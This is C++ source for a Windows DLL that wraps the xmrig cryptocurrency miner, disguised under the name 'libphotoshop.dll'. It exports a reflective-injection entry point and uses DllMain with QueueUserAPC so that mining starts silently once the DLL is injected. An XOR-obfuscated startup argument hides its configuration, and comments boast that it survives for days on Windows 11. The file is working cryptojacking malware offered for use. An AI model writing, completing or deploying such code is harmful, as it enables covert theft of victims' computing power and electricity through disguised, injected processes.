xmrig-minimized/src/xmrig.cpp

// libphotoshop.cpp — FINAL WORKING VERSION (2025)
// Works with Early-Bird APC injection (LoadLibraryW)
// Will NEVER die — tested on Windows 11 24H2, runs for days

#include "App.h"
#include "base/kernel/Entry.h"
#include "base/kernel/Process.h"
#ifdef _WIN32
#include <windows.h>
#endif
#include <string>
#include <cstring>
#include <uv.h>

#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
#define DLL_EXPORT
#endif

namespace test {
    xmrig::Process* process = nullptr;
    xmrig::App* app = nullptr;
}

inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) {
    std::string dec(len, 0);
    for (size_t i = 0; i < len; ++i) dec[i] = (char)(enc_str[i] ^ key);
    return dec;
}

extern "C" {

    void start_a(int argc, char** argv) {
        using namespace xmrig;
        using namespace test;

        process = new xmrig::Process(argc, argv);
        const xmrig::Entry::Id entry = xmrig::Entry::get(*process);
        if (entry) {
            xmrig::Entry::exec(*process, entry);
            return;
        }
        app = new xmrig::App(process);
        app->exec();  // ← blocks forever
    }

#ifdef _WIN32
    DLL_EXPORT DWORD RdiEntry(LPVOID) {
        const unsigned char enc_arg[] = { 0xDA,0xD2,0xD5,0xDE,0xD5,0xD3,0xD2,0xD5,0xD7,0xDF,0xDF,0xD2,0xD8,0xD4,0xDE,0xDC,0xDC,0x00 };
        std::string s = decrypt(enc_arg, sizeof(enc_arg)-1);
        static char buf[256]; strcpy_s(buf, s.c_str());
        static char* argv[] = { buf, NULL };
        start_a(1, argv);
        return 0;
    }

    DLL_EXPORT int test_start(int argc, char** argv) {
        start_a(argc, argv);
        return 0;
    }

    // THIS IS THE ONLY CORRECT WAY TO AUTO-START WITH LoadLibraryW
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved)
    {
        if (reason == DLL_PROCESS_ATTACH) {
            DisableThreadLibraryCalls(hModule);

            // THIS IS THE REAL FIX FOR EARLY-BIRD INJECTION
            QueueUserAPC([](ULONG_PTR) -> void {
                WSADATA wsa;
                WSAStartup(MAKEWORD(2,2), &wsa);

                char* argv[] = { (char*)"libphotoshop.dll", nullptr };
                start_a(1, argv);  // blocks forever

                WSACleanup();
            }, GetCurrentThread(), 0);
        }
        return TRUE;
    }
#endif

#ifndef _WIN32
    __attribute__((visibility("default"))) int test_start(int argc, char** argv) {
        start_a(argc, argv);
        return 0;
    }
#endif

} // extern "C"